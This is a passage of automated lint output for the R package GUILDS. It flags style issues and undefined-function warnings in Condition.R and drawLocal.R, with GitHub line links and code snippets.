^\n```\n[R/Condition.R:130:6:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L130) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​   if(model == \"D0\") cat(\"Theta X =\", x2[1], \n     ^\n```\n[R/Condition.R:130:45:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L130) *style:* **Trailing whitespace is superfluous.**\n```r\n​   if(model == \"D0\") cat(\"Theta X =\", x2[1], \n                                            ^\n```\n[R/Condition.R:131:50:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L131) *style:* **Trailing whitespace is superfluous.**\n```r\n​                         \" Theta Y =\", \"Theta X\", \n                                                 ^\n```\n[R/Condition.R:133:50:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L133) *style:* **Commas should never have a space before.**\n```r\n​                         \" Alpha Y =\", \"Alpha X\" ,\"\\n\")\n                                                ~^\n```\n[R/Condition.R:133:51:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L133) *style:* **Commas should always have a space after.**\n```r\n​                         \" Alpha Y =\", \"Alpha X\" ,\"\\n\")\n                                                  ^\n```\n[R/Condition.R:134:6:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L134) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​   if(model == \"D1\") cat(\"Theta X =\", x2[1], \n     ^\n```\n[R/Condition.R:134:45:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L134) *style:* **Trailing whitespace is superfluous.**\n```r\n​   if(model == \"D1\") cat(\"Theta X =\", x2[1], \n                                            ^\n```\n[R/Condition.R:137:49:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L137) *style:* **Commas should never have a space before.**\n```r\n​                         \" Alpha Y =\", x2[3]    ,\"\\n\");\n                                            ~~~~^\n```\n[R/Condition.R:137:50:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L137) *style:* **Commas should always have a space after.**\n```r\n​                         \" Alpha Y =\", x2[3]    ,\"\\n\");\n                                                 ^\n```\n[R/Condition.R:141:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L141) *style:* **Trailing whitespace is superfluous.**\n```r\n​   \n^~~\n```\n[R/Condition.R:142:9:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L142) *style:* **Variable and function names should be all lowercase.**\n```r\n​  LL <- logLikelihood.Guilds(parameters, model, SADX, SADY, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:142:9:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L142) *warning:* **no visible global function definition for ‘logLikelihood.Guilds’**\n```r\n​  LL <- logLikelihood.Guilds(parameters, model, SADX, SADY, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:143:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L143) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:145:23:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L145) *style:* **Variable and function names should be all lowercase.**\n```r\n​  conditional_part <- calcConditional(parameters, model, Nx, Ny)\n                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:145:23:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L145) *warning:* **no visible global function definition for ‘calcConditional’**\n```r\n​  conditional_part <- calcConditional(parameters, model, Nx, Ny)\n                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:146:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L146) *style:* **Trailing whitespace is superfluous.**\n```r\n​   \n^~~\n```\n[R/Condition.R:151:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L151) *style:* **Variable and function names should be all lowercase.**\n```r\n​conditional.LogLik <- function(v, model, J, Sx, Sy, Nx, Ny, KDA_X, KDA_Y,\n^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:152:72:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L152) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​                               prefactor1, prefactor2, verbose = TRUE) {  \n                                                                       ^\n```\n[R/Condition.R:152:73:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L152) *style:* **Trailing whitespace is superfluous.**\n```r\n​                               prefactor1, prefactor2, verbose = TRUE) {  \n                                                                        ^~\n```\n[R/Condition.R:153:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L153) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:158:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L158) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:159:5:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L159) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(model == \"D1\") {\n    ^\n```\n[R/Condition.R:162:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L162) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:163:5:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L163) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_x < 0 ||\n    ^\n```\n[R/Condition.R:167:18:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L167) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_x > (1-(1e-8)) ||\n                ~^~\n```\n[R/Condition.R:167:19:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L167) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_x > (1-(1e-8)) ||\n                  ^\n```\n[R/Condition.R:168:13:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L168) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_y>(1-(1e-8))\n           ~^~\n```\n[R/Condition.R:168:14:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L168) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_y>(1-(1e-8))\n             ^\n```\n[R/Condition.R:168:16:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L168) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_y>(1-(1e-8))\n              ~^~\n```\n[R/Condition.R:168:17:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L168) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_y>(1-(1e-8))\n                ^\n```\n[R/Condition.R:170:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L170) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:171:9:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L171) *style:* **Variable and function names should be all lowercase.**\n```r\n​  LL <- logLikguilds(theta_x, theta_y, alpha_x, alpha_y, J, \n        ^~~~~~~~~~~~\n```\n[R/Condition.R:171:60:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L171) *style:* **Trailing whitespace is superfluous.**\n```r\n​  LL <- logLikguilds(theta_x, theta_y, alpha_x, alpha_y, J, \n                                                           ^\n```\n[R/Condition.R:174:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L174) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:175:14:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L175) *style:* **Variable and function names should be all lowercase.**\n```r\n​  cond_LL <- calcConditional(v, model, Nx, Ny)\n             ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:175:14:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L175) *warning:* **no visible global function definition for ‘calcConditional’**\n```r\n​  cond_LL <- calcConditional(v, model, Nx, Ny)\n             ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:180:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L180) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:180:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L180) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:180:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L180) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:180:46:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L180) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n                                             ^~~~~~~~\n```\n[R/Condition.R:181:53:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L181) *style:* **Trailing whitespace is superfluous.**\n```r\n​                                             method, \n                                                    ^\n```\n[R/Condition.R:184:12:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L184) *style:* **Variable and function names should be all lowercase.**\n```r\n​  KDA_X <- calcKDA(SADX)\n           ^~~~~~~\n```\n[R/Condition.R:184:12:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L184) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  KDA_X <- calcKDA(SADX)\n           ^~~~~~~\n```\n[R/Condition.R:185:12:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L185) *style:* **Variable and function names should be all lowercase.**\n```r\n​  KDA_Y <- calcKDA(SADY)\n           ^~~~~~~\n```\n[R/Condition.R:185:12:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L185) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  KDA_Y <- calcKDA(SADY)\n           ^~~~~~~\n```\n[R/Condition.R:186:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L186) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:189:6:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L189) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(i in 1:length(x)) freq_x[i] <- x[[i]]\n     ^\n```\n[R/Condition.R:190:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L190) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:191:14:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L191) *style:* **Use <-, not =, for assignment.**\n```r\n​  prefactor1 = -( sum(log(SADX)) + sum(lgamma(1 + freq_x)) )\n             ^\n```\n[R/Condition.R:191:17:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L191) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  prefactor1 = -( sum(log(SADX)) + sum(lgamma(1 + freq_x)) )\n                ^\n```\n[R/Condition.R:192:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L192) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:195:6:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L195) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(i in 1:length(x2)) freq_y[i] <- x2[[i]]\n     ^\n```\n[R/Condition.R:196:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L196) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:197:14:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L197) *style:* **Use <-, not =, for assignment.**\n```r\n​  prefactor2 = -( sum(log(SADY)) + sum(lgamma(1 + freq_y)) )\n             ^\n```\n[R/Condition.R:197:17:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L197) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  prefactor2 = -( sum(log(SADY)) + sum(lgamma(1 + freq_y)) )\n                ^\n```\n[R/Condition.R:199:6:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L199) *style:* **Use <-, not =, for assignment.**\n```r\n​  Sx = length(SADX)\n     ^\n```\n[R/Condition.R:200:6:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L200) *style:* **Use <-, not =, for assignment.**\n```r\n​  Sy = length(SADY)\n     ^\n```\n[R/Condition.R:201:6:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L201) *style:* **Use <-, not =, for assignment.**\n```r\n​  Nx = sum(SADX)\n     ^\n```\n[R/Condition.R:202:6:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L202) *style:* **Use <-, not =, for assignment.**\n```r\n​  Ny = sum(SADY)\n     ^\n```\n[R/Condition.R:203:5:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L203) *style:* **Use <-, not =, for assignment.**\n```r\n​  J = Nx + Ny\n    ^\n```\n[R/Condition.R:206:17:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L206) *style:* **Variable and function names should be all lowercase.**\n```r\n​    out <- -1 * conditional.LogLik(x, model, J, Sx, Sy, Nx, Ny,\n                ^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:211:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L211) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:213:5:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L213) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(method == \"simplex\") {\n    ^\n```\n[R/Condition.R:214:10:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L214) *warning:* **no visible global function definition for ‘simplex’, Did you mean 'complex'?**\n```r\n​    x <- simplex(initVals, g, verbose)\n         ^~~~~~~\n```\n[R/Condition.R:214:18:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​    x <- simplex(initVals, g, verbose)\n                 ^~~~~~~~\n```\n[R/Condition.R:215:4:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L215) *style:* **Trailing whitespace is superfluous.**\n```r\n​  } \n   ^\n```\n[R/Condition.R:216:5:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L216) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(method == \"subplex\") {\n    ^\n```\n[R/Condition.R:217:7:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L217) *warning:* **no visible global function definition for ‘subplex’**\n```r\n​\tx <- subplex(initVals, g)\n      ^~~~~~~\n```\n[R/Condition.R:217:11:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L217) *style:* **Put spaces around all infix operators.**\n```r\n​\tx <- subplex(initVals, g)\n         ~^~~\n```\n[R/Condition.R:217:22:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L217) *style:* **Variable and function names should be all lowercase.**\n```r\n​\tx <- subplex(initVals, g)\n                     ^~~~~~~~\n```\n[R/drawLocal.R:1:23:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L1) *style:* **Commas should always have a space after.**\n```r\n​pm_sad <- function(th,I,j) {\n                      ^\n```\n[R/drawLocal.R:1:25:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L1) *style:* **Commas should always have a space after.**\n```r\n​pm_sad <- function(th,I,j) {\n                        ^\n```\n[R/drawLocal.R:3:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L3) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n^\n```\n[R/drawLocal.R:3:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L3) *style:* **lines should not be more than 80 characters.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:3:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L3) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ty = matrix(0,nrow=size(x)[1],ncol=size(x)[2]);\n^\n```\n[R/drawLocal.R:3:12:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L3) *style:* **Use <-, not =, for assignment.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n           ^\n```\n[R/drawLocal.R:3:12:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L3) *style:* **Put spaces around all infix operators.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n          ~^~\n```\n[R/drawLocal.R:3:29:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L3) *style:* **Put spaces around all infix operators.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n                           ~^~\n```\n[R/drawLocal.R:3:43:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L3) *style:* **Put spaces around all infix operators.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n                                         ~^~\n```\n[R/drawLocal.R:3:50:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L3) *style:* **Put spaces around all infix operators.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n                                                ~^\n```\n[R/drawLocal.R:3:57:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L3) *style:* **Commented code should be removed.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n                                                        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:4:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tres=rep(0,length(k1))  \t\t\t\t\t\t\t\t  #res=zeros(1,length(k1));\n^\n```\n[R/drawLocal.R:4:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tidx0=which(x==0);\n^\n```\n[R/drawLocal.R:4:12:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L4) *style:* **Use <-, not =, for assignment.**\n```r\n​\tres=rep(0,length(k1))  \t\t\t\t\t\t\t\t  #res=zeros(1,length(k1));\n           ^\n```\n[R/drawLocal.R:4:12:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L4) *style:* **Put spaces around all infix operators.**\n```r\n​\tres=rep(0,length(k1))  \t\t\t\t\t\t\t\t  #res=zeros(1,length(k1));\n          ~^~\n```\n[R/drawLocal.R:4:25:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tres=rep(0,length(k1))  \t\t\t\t\t\t\t\t  #res=zeros(1,length(k1));\n                        ^~~~~~~~\n```\n[R/drawLocal.R:4:36:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L4) *style:* **Commented code should be removed.**\n```r\n​\tres=rep(0,length(k1))  \t\t\t\t\t\t\t\t  #res=zeros(1,length(k1));\n                                   ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:5:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L5) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(cnt in 1:length(k1)) {\n^\n```\n[R/drawLocal.R:5:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L5) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(idx0)) {\n^\n```\n[R/drawLocal.R:5:12:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L5) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(cnt in 1:length(k1)) {\n           ^\n```\n[R/drawLocal.R:6:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tk = k1[cnt];\n^~\n```\n[R/drawLocal.R:6:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\taux = log(th) + lgamma(I) - lgamma(I+j) +\n^~\n```\n[R/drawLocal.R:6:19:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L6) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\tk = k1[cnt];\n                  ^\n```\n[R/drawLocal.R:7:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:7:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n^~~\n```\n[R/drawLocal.R:7:19:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:8:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\treturn(-1 * pm_sadaux(x,I,th,j,k));\n^~~\n```\n[R/drawLocal.R:8:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  lgamma(k) +   lgamma(I+j-k) - lgamma(I) + log(I);\n^~~\n```\n[R/drawLocal.R:8:16:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L8) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\treturn(-1 * pm_sadaux(x,I,th,j,k));\n               ^~~~~~~~~\n```\n[R/drawLocal.R:8:35:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\treturn(-1 * pm_sadaux(x,I,th,j,k));\n                                 ~^~\n```\n[R/drawLocal.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ty[idx0] = aux;\n^~\n```\n[R/drawLocal.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txmax = optimize(f,c(0,1))$minimum\n^~\n```\n[R/drawLocal.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:10:22:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L10) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\txmax = optimize(f,c(0,1))$minimum\n                     